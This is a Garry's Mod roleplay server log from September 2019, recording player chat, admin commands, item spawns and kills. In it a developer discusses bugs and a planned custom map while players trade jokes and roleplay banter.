Mon Sep  2 20:22:55 2019	Thomas (STEAM_0:0:121940340): !hp Thomas 100000
Mon Sep  2 20:23:17 2019	Thomas (STEAM_0:0:121940340): !hp Thomas 100
Mon Sep  2 20:23:22 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:23:24 2019	Derp (STEAM_0:0:52504530): there is a mod on duty job
Mon Sep  2 20:23:38 2019	Derp (STEAM_0:0:52504530): its at the very bottom
Mon Sep  2 20:24:37 2019	Derp (STEAM_0:0:52504530): thats strange it should work
Mon Sep  2 20:25:08 2019	Derp (STEAM_0:0:52504530): i think i know how to fix it but its not gonna be fixed until next update
Mon Sep  2 20:25:12 2019	Derp (STEAM_0:0:52504530): in the meanwhile just use citizen
Mon Sep  2 20:25:38 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:25:38 2019	Derp (STEAM_0:0:52504530): ok
Mon Sep  2 20:25:43 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:25:49 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:25:59 2019	Thomas (STEAM_0:0:121940340): // false
Mon Sep  2 20:26:10 2019	Thomas (STEAM_0:0:121940340): 
Mon Sep  2 20:26:11 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // set me to owner wtf
Mon Sep  2 20:26:19 2019	DrDerpenstein (STEAM_0:0:13562763): // lol testing things
Mon Sep  2 20:26:39 2019	Derp (STEAM_0:0:52504530): ok there u go
Mon Sep  2 20:26:39 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): // grant me access to ulx rcon real quick
Mon Sep  2 20:26:45 2019	Thomas (STEAM_0:0:121940340) spawned
Mon Sep  2 20:26:50 2019	DrDerpenstein (STEAM_0:0:13562763): // sorry mate
Mon Sep  2 20:26:56 2019	Derp (STEAM_0:0:52504530): how
Mon Sep  2 20:27:05 2019	Derp (STEAM_0:0:52504530): ah
Mon Sep  2 20:27:10 2019	Derp (STEAM_0:0:52504530): well ill be sure to fix it anyways
Mon Sep  2 20:27:26 2019	Derp (STEAM_0:0:52504530): lmao
Mon Sep  2 20:27:26 2019	Thomas (STEAM_0:0:121940340): !cloak xd
Mon Sep  2 20:27:27 2019	Thomas (STEAM_0:0:121940340): !uncloak xd
Mon Sep  2 20:27:29 2019	Derp (STEAM_0:0:52504530): gmod is glitchy bruh
Mon Sep  2 20:27:56 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:27:56 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:27:56 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:27:56 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:27:56 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:27:56 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:27:57 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 20:27:57 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 20:27:57 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 20:27:57 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 20:27:57 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 20:27:58 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 20:27:58 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 20:27:58 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 20:27:58 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 20:27:58 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_altfire
Mon Sep  2 20:27:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_altfire
Mon Sep  2 20:27:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_altfire
Mon Sep  2 20:27:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 20:27:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 20:27:59 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 20:28:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 20:28:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 20:28:00 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_rpg_round
Mon Sep  2 20:28:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 20:28:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 20:28:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_box_buckshot
Mon Sep  2 20:28:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_crossbow
Mon Sep  2 20:28:01 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_crossbow
Mon Sep  2 20:28:02 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_crossbow
Mon Sep  2 20:28:02 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 20:28:02 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_pistol_large
Mon Sep  2 20:28:03 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:28:03 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_smg1_large
Mon Sep  2 20:28:04 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_357_large
Mon Sep  2 20:28:04 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_ammo_ar2_large
Mon Sep  2 20:28:05 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 20:28:05 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 20:28:05 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT item_battery
Mon Sep  2 20:28:20 2019	Derp (STEAM_0:0:52504530): sorry about all of the trouble so far
Mon Sep  2 20:28:28 2019	Thomas (STEAM_0:0:121940340): !menu
Mon Sep  2 20:29:14 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): ill enable my spinbot
Mon Sep  2 20:29:18 2019	Thomas (STEAM_0:0:121940340): /name xd MrShrimp
Mon Sep  2 20:29:25 2019	bobbicus has a wonderful voice (STEAM_0:1:179345279): /name thomas
Mon Sep  2 20:29:30 2019	Derp (STEAM_0:0:52504530): 
Mon Sep  2 20:30:42 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_muffin
Mon Sep  2 20:30:42 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_muffin
Mon Sep  2 20:30:42 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_muffin
Mon Sep  2 20:30:43 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_muffin
Mon Sep  2 20:30:43 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_muffin
Mon Sep  2 20:30:43 2019	DrDerpenstein (STEAM_0:0:13562763) spawned SENT zwf_muffin
Mon Sep  2 20:30:45 2019	Derp (STEAM_0:0:52504530): 
Mon Sep  2 20:31:29 2019	xd MrShrimp (STEAM_0:0:121940340): 
Mon Sep  2 20:31:41 2019	xd MrShrimp (STEAM_0:0:121940340): // false
Mon Sep  2 20:31:55 2019	Derp (STEAM_0:0:52504530): ye
Mon Sep  2 20:32:06 2019	Derp (STEAM_0:0:52504530): like a report?
Mon Sep  2 20:32:10 2019	Derp (STEAM_0:0:52504530): 
Mon Sep  2 20:32:50 2019	xd MrShrimp (STEAM_0:0:121940340): /setmoney xd 1
Mon Sep  2 20:33:21 2019	xd MrShrimp (STEAM_0:0:121940340): !3p
Mon Sep  2 20:33:24 2019	xd MrShrimp (STEAM_0:0:121940340): !3p
Mon Sep  2 20:33:28 2019	xd MrShrimp (STEAM_0:0:121940340): !1p
Mon Sep  2 20:33:35 2019	Derp (STEAM_0:0:52504530): wait are u trying to change cameras?
Mon Sep  2 20:33:43 2019	Derp (STEAM_0:0:52504530): ah
Mon Sep  2 20:33:58 2019	thomas (STEAM_0:1:179345279): // WOMBLE
Mon Sep  2 20:34:18 2019	xd MrShrimp (STEAM_0:0:121940340): // who the fuck is that
Mon Sep  2 20:34:23 2019	Derp (STEAM_0:0:52504530): no idea
Mon Sep  2 20:34:38 2019	Derp (STEAM_0:0:52504530): color of names?
Mon Sep  2 20:34:58 2019	thomas (STEAM_0:1:179345279): // its womble dumbass
Mon Sep  2 20:34:58 2019	Derp (STEAM_0:0:52504530): i think that already is a thing
Mon Sep  2 20:35:07 2019	thomas (STEAM_0:1:179345279): /name mohammed from uber eats
Mon Sep  2 20:35:12 2019	Derp (STEAM_0:0:52504530) spawned
Mon Sep  2 20:35:17 2019	Derp (STEAM_0:0:52504530): you mean this?
Mon Sep  2 20:35:20 2019	Derp (STEAM_0:0:52504530): my name is now yellow?
Mon Sep  2 20:35:30 2019	Derp (STEAM_0:0:52504530): like to whatever u want?
Mon Sep  2 20:35:36 2019	mohammed from uber eats (STEAM_0:1:179345279): /name bert simson
Mon Sep  2 20:35:59 2019	Derp (STEAM_0:0:52504530): um im sure there is a way to do that but right now its just for jobs
Mon Sep  2 20:36:17 2019	Derp (STEAM_0:0:52504530): aight
Mon Sep  2 20:36:25 2019	Derp (STEAM_0:0:52504530): orange or some shit
Mon Sep  2 20:36:34 2019	Derp (STEAM_0:0:52504530): idk i think citizen is green
Mon Sep  2 20:36:51 2019	Derp (STEAM_0:0:52504530): alright i will try to figure that out
Mon Sep  2 20:36:56 2019	Derp (STEAM_0:0:52504530): we update the server like every week so
Mon Sep  2 20:37:04 2019	bert simson (STEAM_0:1:179345279): /drop
Mon Sep  2 20:37:15 2019	Derp (STEAM_0:0:52504530): soon we are gonna be getting a custom map
Mon Sep  2 20:37:25 2019	Womble (STEAM_0:1:110782291) has joined the game
Mon Sep  2 20:37:25 2019	Womble (STEAM_0:1:110782291) spawned
Mon Sep  2 20:37:32 2019	Derp (STEAM_0:0:52504530): its gonna be an entirely new map
Mon Sep  2 20:38:03 2019	Derp (STEAM_0:0:52504530): its gonna be a downtown type of map but just not downtown or any other map u have seen so far
Mon Sep  2 20:38:09 2019	Womble (STEAM_0:1:110782291): /name Squishy
Mon Sep  2 20:38:09 2019	bert simson (STEAM_0:1:179345279): hmm
Mon Sep  2 20:38:19 2019	bert simson (STEAM_0:1:179345279): hmmmmmm
Mon Sep  2 20:38:23 2019	Squishy (STEAM_0:1:110782291): /me nuzzles
Mon Sep  2 20:38:29 2019	Derp (STEAM_0:0:52504530): nah its gonna be smaller and this map is actually laggy as fuck
Mon Sep  2 20:38:42 2019	bert simson (STEAM_0:1:179345279): talk real quick
Mon Sep  2 20:38:44 2019	Squishy (STEAM_0:1:110782291): Would you care to join the Furries?
Mon Sep  2 20:38:45 2019	Derp (STEAM_0:0:52504530): me neither but compared to other maps this one is more demanding
Mon Sep  2 20:38:54 2019	Derp (STEAM_0:0:52504530): especially because of the ocean
Mon Sep  2 20:39:04 2019	Squishy (STEAM_0:1:110782291): ?
Mon Sep  2 20:39:06 2019	Derp (STEAM_0:0:52504530): yeah its dumb af
Mon Sep  2 20:39:24 2019	Derp (STEAM_0:0:52504530): dont worry we will make sure the map is optimized and easy to figure out
Mon Sep  2 20:39:27 2019	Derp (STEAM_0:0:52504530): its not gonna be anything extreme
Mon Sep  2 20:39:28 2019	bert simson (STEAM_0:1:179345279): hmm
Mon Sep  2 20:39:39 2019	bert simson (STEAM_0:1:179345279): you know a guy named mohammed by chance?
Mon Sep  2 20:39:43 2019	Derp (STEAM_0:0:52504530): bert is a chill dude so dont be harsh on him lol
Mon Sep  2 20:39:49 2019	Squishy (STEAM_0:1:110782291): No, I don't believe so
Mon Sep  2 20:39:52 2019	Derp (STEAM_0:0:52504530): ah
Mon Sep  2 20:39:59 2019	Derp (STEAM_0:0:52504530): let me go see this squishy guy
Mon Sep  2 20:40:03 2019	bert simson (STEAM_0:1:179345279): no hes uhhh an uber eats driver
Mon Sep  2 20:40:07 2019	xd MrShrimp (STEAM_0:0:121940340): 
Mon Sep  2 20:40:17 2019	Squishy (STEAM_0:1:110782291) spawned
Mon Sep  2 20:40:30 2019	Squishy (STEAM_0:1:110782291): /me nuzzles
Mon Sep  2 20:40:37 2019	xd MrShrimp (STEAM_0:0:121940340): 
Mon Sep  2 20:40:55 2019	Squishy (STEAM_0:1:110782291): /me nuzzles
Mon Sep  2 20:41:02 2019	xd MrShrimp (STEAM_0:0:121940340): /pm derp m watching
Mon Sep  2 20:41:07 2019	xd MrShrimp (STEAM_0:0:121940340): /pm derp im
Mon Sep  2 20:41:14 2019	Squishy (STEAM_0:1:110782291): /me puts on Fursuit
Mon Sep  2 20:41:31 2019	Squishy (STEAM_0:1:110782291): /me takes out a sign, stating the text
Mon Sep  2 20:41:34 2019	Squishy (STEAM_0:1:110782291): /me 'uwu'
Mon Sep  2 20:41:36 2019	Squishy was killed by Derp with a cw_mr96
Mon Sep  2 20:41:36 2019	bert simson was killed by Derp with a cw_mr96
Mon Sep  2 20:41:46 2019	bert simson (STEAM_0:1:179345279): he has some methamphetamines
Mon Sep  2 20:41:47 2019	Squishy (STEAM_0:1:110782291) spawned
Mon Sep  2 20:41:48 2019	bert simson (STEAM_0:1:179345279) spawned
Mon Sep  2 20:41:51 2019	Squishy (STEAM_0:1:110782291): // 'Fatality'
Mon Sep  2 20:42:02 2019	bert simson (STEAM_0:1:179345279): // dude thats the best csgo cheat
Mon Sep  2 20:42:06 2019	Squishy (STEAM_0:1:110782291): // What?
Mon Sep  2 20:42:08 2019	Squishy (STEAM_0:1:110782291): // Are you okay?
Mon Sep  2 20:42:17 2019	Squishy (STEAM_0:1:110782291): /me nuzzles
Mon Sep  2 20:42:36 2019	xd MrShrimp (STEAM_0:0:121940340): 
Mon Sep  2 20:42:46 2019	xd MrShrimp (STEAM_0:0:121940340): 
Mon Sep  2 20:42:47 2019	Squishy (STEAM_0:1:110782291): I wasn't planning on it
Mon Sep  2 20:43:10 2019	bert simson (STEAM_0:1:179345279): // ??? all other cheats pale in comparison to fatality man its been undetected since 2008
Mon Sep  2 20:43:40 2019	Squishy (STEAM_0:1:110782291): You ever been with a four-headed gorilla equipped with a dogs legs, cows chest, gorilla head, snake tongue, and bird feet
Mon Sep  2 20:43:44 2019	Squishy (STEAM_0:1:110782291): I can help you out
Mon Sep  2 20:44:25 2019	Derp (STEAM_0:0:52504530) spawned Vehicle prop_vehicle_jeep (sw_fcc)
Mon Sep  2 20:44:41 2019	xd MrShrimp (STEAM_0:0:121940340): // brb
Mon Sep  2 20:44:55 2019	xd MrShrimp (STEAM_0:0:121940340) disconnected
Mon Sep  2 20:44:57 2019	Squishy (STEAM_0:1:110782291): /me nuzzles
Mon Sep  2 20:45:02 2019	Squishy was killed by Derp with a prop_vehicle_jeep
Mon Sep  2 20:45:06 2019	Squishy (STEAM_0:1:110782291) spawned
Mon Sep  2 20:45:51 2019	bert simson (STEAM_0:1:179345279): fake duck police
Mon Sep  2 20:48:40 2019	Squishy (STEAM_0:1:110782291) disconnected
Mon Sep  2 20:49:08 2019	bert simson (STEAM_0:1:179345279): // smh fake womble
Mon Sep  2 20:52:19 2019	Derp (STEAM_0:0:52504530): DerpCorp
Mon Sep  2 20:52:29 2019	DrDerpenstein (STEAM_0:0:13562763): DerpCoRP
Mon Sep  2 20:53:17 2019	Derp was killed by Himself with a suicide trick
Mon Sep  2 20:53:21 2019	Derp (STEAM_0:0:52504530) disconnected
Mon Sep  2 20:54:29 2019	DrDerpenstein was killed by bert simson with a cw_makarov
Mon Sep  2 20:54:47 2019	bert simson (STEAM_0:1:179345279): /drop
Mon Sep  2 20:54:53 2019	bert simson (STEAM_0:1:179345279) disconnected
Mon Sep  2 20:56:08 2019	DrDerpenstein (STEAM_0:0:13562763) spawned
Mon Sep  2 21:27:27 2019	DrDerpenstein (STEAM_0:0:13562763) disconnected